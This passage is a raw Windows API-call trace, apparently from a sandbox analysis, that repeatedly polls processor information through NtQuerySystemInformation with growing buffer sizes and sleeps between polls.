[0224.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.467] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.468] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.468] Sleep (dwMilliseconds=0x110) [0224.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.488] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.489] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.489] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.489] Sleep (dwMilliseconds=0x110) [0224.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.505] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.505] Sleep (dwMilliseconds=0x110) [0224.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.521] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.521] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.521] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.522] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.522] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.522] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.523] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.523] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.523] Sleep (dwMilliseconds=0x110) [0224.544] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.544] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.554] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.555] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.555] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.555] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.555] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.559] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.559] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.560] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.560] Sleep (dwMilliseconds=0x110) [0224.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.583] Sleep (dwMilliseconds=0x110) [0224.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.598] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.598] Sleep (dwMilliseconds=0x110) [0224.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.612] Sleep (dwMilliseconds=0x110) [0224.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.630] Sleep (dwMilliseconds=0x110) [0224.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.645] Sleep (dwMilliseconds=0x110) [0224.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.661] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.661] Sleep (dwMilliseconds=0x110) [0224.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.676] Sleep (dwMilliseconds=0x110) [0224.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.689] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.690] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.690] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.690] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.691] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.691] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.691] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.692] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.692] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.692] Sleep (dwMilliseconds=0x110) [0224.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.705] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.705] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.705] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0224.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.706] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.706] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0224.706] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0224.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0224.707] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.707] Sleep (dwMilliseconds=0x110) [0224.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0224.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0224.721] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0224.721] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0224.721] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 